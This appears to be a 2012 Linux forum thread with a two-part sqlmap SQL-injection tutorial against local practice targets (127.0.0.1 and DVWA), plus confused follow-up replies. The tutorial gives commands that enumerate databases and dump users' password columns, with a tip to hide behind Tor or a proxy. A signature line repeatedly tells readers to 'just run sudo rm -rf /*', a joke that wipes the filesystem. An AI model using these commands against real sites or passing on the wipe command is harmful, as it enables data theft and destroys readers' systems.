SqlMap - SQL Injection with BackBox part 1/2

Started by ZEROF, June 29, 2012, 02:18:12 PM

Previous topic - Next topic

ZEROF

SqlMap

Sql Injection Tool part 1

OS/OS: BackBox Linux (version 2.05)
Target : 127.0.0.1
Vulnerable Url : 127.0.0.1/SQLInjection/injection.php?id=1

Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :

sqlmap -u some.com/index.php?id=1 --dbs
sqlmap -D mysql data base --tables
sqlmap -D mysql data base -T table name --columns
sqlmap -D mysql data base -T table name -C column or columns name --dump


Video

http://www.youtube.com/watch?v=BDI0t1gBUMA



Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

ZEROF

SqlMap + Live Http Headers Addon

Sql Injection Tool part 2

OS: BackBox Linux (version2.05)
Tool on +: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
Target: 127.0.0.1
Vulnerable Url: 127.0.0.1/dvwa/

I will use cookies from session to run SQL injection attack. Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :

sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' --dbs

sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa --tables

sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users --columns

sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users -C password,user --dump


Video

http://youtu.be/4Dg0ODJBZxM

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

drego85

Andrea Draghetti
Personal Blog

V3nD3774

ZEROF,
is the link:  127.0.0.1/SQLInjection/injection.php?id=1 still ON ?

I did try few times but no luck.

Tx

Not Found

The requested URL /SQLInjection/injection.php was not found on this server.

b4d_bl0ck

#4
Thanks for sharing, ZEROF. Nice vids.. and nice BB desktop aspect.

V3nD3774   :o
Try:ping 127.0.0.1If the host is reachable but you cannot access that URI, most probably your ISP is tracking you and blocking your connections, and maybe has alredy provided your data to a cybercrime investigation agency.
In this case a successful solution could be:less /etc/hosts also sudo ifconfig lo or if it's not enough try this.
Good luck!
bool secure = check_paranoia() ? true : false;

ZEROF

QuoteZEROF,
is the link:  127.0.0.1/SQLInjection/injection.php?id=1 still ON ?

When you need to find path for files use whereis or find command. Let's say you want to find injection.php file in your system, you can use from terminal:

find / -name injection.php

How to use find command:

Cheers !

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

V3nD3774

Sorry ZEROF,
I might have misunderstood your message (likely because I am a nooob..) but I was not looking how to find a file in my machine...rather was asking whether the link : 127.0.0.1/SQLInjection/injection.php?id=1  it is still a valid link...this because when i try to reach this link i just get the following message:

Not Found

The requested URL /SQLInjection/injection.php was not found on this server.
Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80

I will not even comment re b4d_bl0ck post...it is quite hilarious to say the least (...and maybe has alredy provided your data to a cybercrime investigation agency)...

Tx again,
~V

b4d_bl0ck

V3nD3774, sorry for my irony, i didn't want to offend you.
I just wanted encurage you to read, before getting hands on things... and i guess you didn't visit the link i provided you.  :)
What i was trying to explain you is that 127.0.0.1 is nothing more than your PC. If you have no Apache server running on your system listening on port 80, or you have no resource on your server named /SQLInjection/injection.php, you'll never be able to open it. Evidently ZEROF created a vulnerable app by his own hands or downloaded it, and put it in his server, ready to be exploited.
The URL will never be a valid link to you, until you do the same and put in your server a page with the same path and name. That's not an internet resource, but a local one, so it ha no sense asking others if it's a valid link or not...  ;)
Sorry for having joked in the first reply.

Have fun!
bool secure = check_paranoia() ? true : false;

V3nD3774